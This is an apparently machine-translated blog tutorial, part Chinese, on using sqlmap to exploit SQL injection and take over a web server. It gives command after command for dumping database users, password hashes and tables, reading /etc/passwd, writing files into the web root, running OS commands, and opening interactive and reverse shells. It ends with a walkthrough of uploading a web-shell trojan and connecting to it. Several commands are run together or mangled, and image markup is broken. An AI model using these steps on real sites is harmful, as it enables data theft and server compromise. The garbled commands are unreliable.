Using Sqlmap to get the server shell

1. Introduction

Sqlmap is an automated SQL injection tool whose main function is to scan, discover, and exploit the SQL injection vulnerability of a given URL, currently supported by MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, and SAP MaxDB. Five unique SQL injection techniques are used, namely:

1) A Boolean-based blind, that can be based on the return page to determine the conditions of the true and false injection.

2) The time-based blind, that is, cannot judge any information based on the page return content, using conditional statements to see if the time delay statement is executed (that is, if the page return time is increased) to determine.
3) based on the error injection, that is, the page will return incorrect information, or the results of the injected statement directly back to the page.
4) Joint query injection, which can be injected using the Union case.
5) heap Query injection, you can execute the execution of multiple statements at the same time injection.

2. Parameters

-U #注入点
--sql-shell return to SQL Shell
-F #指纹判别数据库类型
-B #获取数据库版本信息
-P #指定可测试的参数 (? page=1&id=2-p "Page,id")
-D "" #指定数据库名
-T "" #指定表名
-C "" #指定字段
-S "" #保存注入过程到一个文件, also can be interrupted, next recovery in injection (Save:-S "xx.log" recovery:-S "Xx.log"--resume)
--level= (1-5) #要执行的测试水平等级, default is 1
--risk= (0-3) #测试执行的风险等级, default is 1
--time-sec= (2,5) #延迟响应, default is 5
--data #通过POST发送数据
--columns #列出字段
--current-user #获取当前用户名称
--current-db #获取当前数据库名称
--users #列数据库所有用户
--passwords #数据库用户所有密码
--privileges #查看用户权限 (--privileges-u root)
- u #指定数据库用户
–prefix=prefix Injecting payload String prefix
–suffix=suffix Injecting payload string suffix

--dbs #列出所有数据库
--tables-d "" #列出指定数据库中的表
--columns-t "User"-D "MySQL" #列出mysql数据库中的user表的所有字段
--dump-all #列出所有数据库所有表
--exclude-sysdbs #只列出用户自己新建的数据库和表
--dump-t ""-D ""-C "" #列出指定数据库的表的字段的数据 (--dump-t users-d master-c surname)
--dump-t ""-D ""--start 2--top 4 # Data for 2-4 fields of tables in the specified database
--dbms #指定数据库 (mysql,oracle,postgresql,microsoft SQL server,microsoft access,sqlite,firebird,sybase,sap MaxDB)
--os #指定系统 (linux,windows)
-V #详细的等级 (0-6)
0: Only python backtracking, errors, and critical messages are displayed.
1: Displays information and warning messages.
2: Display debug message.
3: Payload injection.
4: The HTTP request is displayed.
5: The HTTP response header is displayed.
6: Display the contents of the HTTP response page
--privileges #查看权限
--IS-DBA #是否是数据库管理员
--roles #枚举数据库用户角色
--udf-inject #导入用户自定义函数 (Get system permissions)
--union-check #是否支持union Injection
--union-cols #union query Table records
--union-test #union Statement Test
--union-use #采用union Injection
--union-tech #union配合order by
--data "" #POST方式提交数据 (--data "page=1&id=2")
--cookie "use; separate" #cookie注入 (--cookies= "phpsessid=mvijocbglq6pi463rlgk1e4v52; Security=low")
--referer "" #使用referer欺骗 (--referer "http://www.baidu.com")
--user-agent "" #自定义user-agent
--proxy "http://127.0.0.1:8118" #代理注入
--string= "" #指定关键词, string matching.
--threads #采用多线程 (--threads 3)
--sql-shell #执行指定sql命令
--sql-query #执行指定的sql语句 (--sql-query "Select password from mysql.user WHERE user = ' root ' LIMIT 0, 1")
--file-read #读取指定文件
--file-write #写入本地文件 (--file-write/test/test.txt--file-dest/var/www/html/1.txt; writes the local test.txt file to the target 1.txt)
--file-dest #要写入的文件绝对路径
--os-cmd=id #执行系统命令
--os-shell #系统交互shell
--os-pwn #反弹shell (--os-pwn--msf-path=/opt/framework/msf3/)
--msf-path= #matesploit绝对路径 (--msf-path=/opt/framework/msf3/)
--os-smbrelay #
--os-bof #
--reg-read #读取win系统注册表
--PRIV-ESC #
--time-sec= #延迟设置 Default--time-sec=5 is 5 seconds
-P "user-agent"--user-agent "Sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" #指定user-agent Injection
--eta #盲注

3. Common statements

#列出当前库所有表

Python sqlmap/sqlmap.py-u "http://url/news?id=1"--union-cols #union query table records
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--cookie "Cookie_value" #cookie injected into python sqlmap/ Sqlmap.py-u "http://url/news?id=1"--current-user #获取当前用户名称

Python sqlmap/sqlmap.py-u "http://www.xxoo.com/news?id=1"--current-db #获取当前数据库名称
Python sqlmap/sqlmap.py-u "http://www.xxoo.com/news?id=1"--tables-d "Db_name" #列表名
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--columns-t "tablename" users-d "db_name"-V 0 #列字段
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--dump-c "column_name"-T "table_name"-D "db_name"-V 0 #获取字段内容

Python sqlmap/sqlmap.py-u "http://url/news?id=1"--smart--level 3--users # Smart level to perform test levels
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--dbms "Mysql"--users # DBMS specifies the database type
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--users #列数据库用户
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--dbs# column database
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--passwords #数据库用户密码
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--passwords-u root-v 0 #列出指定用户数据库密码
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--dump-c "Password,user,id"-T "tablename"-D "db_name"--start 1- -stop #列出指定字段, listing 20
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--dump-all-v 0 #列出所有数据库所有表
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--privileges #查看权限
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--privileges-u root #查看指定用户权限
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--is-dba-v 1 #是否是数据库管理员
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--roles #枚举数据库用户角色
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--udf-inject #导入用户自定义函数 (Get system permissions!) ）
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--dump-all--exclude-sysdbs-python sqlmap/sqlmap.py-u "http://url/n Ews?id=1 "-B #获取banner信息

Python sqlmap/sqlmap.py-u "http://url/news?id=1"--data "id=3" #post注入

Python sqlmap/sqlmap.py-u "http://url/news?id=1"-V 1-f #指纹判别数据库类型
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--proxy"http://127.0.0.1:8118"#代理注入
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--string" String_on_true_page "#指定关键词
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--sql-shell #执行指定sql命令
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--FILE/ETC/PASSWD
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--os-cmd=whoami #执行系统命令
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--os-shell #系统交互shell
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--os-pwn #反弹shell
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--reg-read #读取win系统注册表
Python sqlmap/sqlmap.py-u "http://url/news?id=1"--dbs-o" Sqlmap.log "#保存进度

4. Injection process

a simple injection process

1. Read the database version, current user, current database

Sqlmap-u Http://www.xxxxx.com/test.php?p=2-f-B--current-user--current-db-v 1

2. Determine current database user rights

Sqlmap-u http://www.xxxxx.com/test.php?p=2--privileges-u User name-V 1

Sqlmap-u http://www.xxxxx.com/test.php?p=2--is-dba-u User name-V 1

3. Read the password of all database users or specified database users

Sqlmap-u http://www.xxxxx.com/test.php?p=2--users--passwords-v 2

Sqlmap-u http://www.xxxxx.com/test.php?p=2--passwords-u root-v 2

4. Get all databases

Sqlmap-u http://www.xxxxx.com/test.php?p=2--dbs-v 2

5. Get all tables in the specified database

Sqlmap-u http://www.xxxxx.com/test.php?p=2--tables-d mysql-v 2

6. Gets the field of the specified table in the specified database name

Sqlmap-u http://www.xxxxx.com/test.php?p=2--columns-d mysql-t users-v 2

7. Gets the data for the specified field in the specified table in the specified database name

Sqlmap-u http://www.xxxxx.com/test.php?p=2--dump-d mysql-t users-c "Username,password"-S "sqlnmapdb.log"-V 2

8.file-read reading Web files

Sqlmap-u http://www.xxxxx.com/test.php?p=2--file-read "/etc/passwd"-V 2

9.file-write writing files to the Web

Sqlmap-u http://www.xxxxx.com/test.php?p=2--file-write/localhost/mm.php--file-dest/var/www/html/xx.php-v 2

5. Practical Walkthrough

A website demo of a colleague from PHP:

1. Manually attempting a Web site without SQL injection vulnerability

2. Scan with Acunetix Web Vulnerability tool and find SQL Blind Vulnerability

6. Start-Up injection:

Sqlmap.py-r Filename.txt--dbs--level=3

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/70/31/wKiom1Wzjxnjv9-6AAMS2sFxpv0820.jpg "title=" 1.png " alt= "Wkiom1wzjxnjv9-6aams2sfxpv0820.jpg"/>

According to the explosion of the library to explode the Administrator's table:

Sqlmap-r filename.txt--level=3--tables-d dbnamesqlmap-r filename.txt--level=3--columns-t tablename-d dbnamesqlmap -R filename.txt--level=3--dump-c "Username,password"-t tablename-d DBNAME

Burst to MD5 value, through the relevant MD5 query the site to solve the password, found no on-line address in the background, useless

Features of the Os-shell using Sqlmap

The premise is that the physical path of the site must be burst: This method is more, such as: Phpinfo file, access error report path, debug debug Open Burst path.

Sqlmap.py-r filename.txt--os-shell

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/70/31/wKiom1WzkRaylzFHAAR_8xVBX1M655.jpg "title=" 1.png " alt= "Wkiom1wzkraylzfhaar_8xvbx1m655.jpg"/>650) this.width=650; src= http://s3.51cto.com/wyfs02/M00/70/2E/ Wkiol1wzk2pbnrlcaas4thn7t1u137.jpg "title=" 1.png "alt=" wkiol1wzk2pbnrlcaas4thn7t1u137.jpg "/> can be seen uploaded successfully, We upload a word from this address Trojan:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/70/31/wKiom1WzkjeSrHvnAACZsohqgP8858.jpg "title=" 1.png " alt= "Wkiom1wzkjesrhvnaaczsohqgp8858.jpg"/>

After uploading a successful word trojan, use the chopper to connect

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/70/31/wKiom1WzkpyRyIufAAKcIU8o6R4896.jpg "title=" 1.png " alt= "Wkiom1wzkpyryiufaakciu8o6r4896.jpg"/>

This article is from the "Sword Slave" blog, be sure to keep this source http://diudiu.blog.51cto.com/6371183/1678358

Using Sqlmap to get the server shell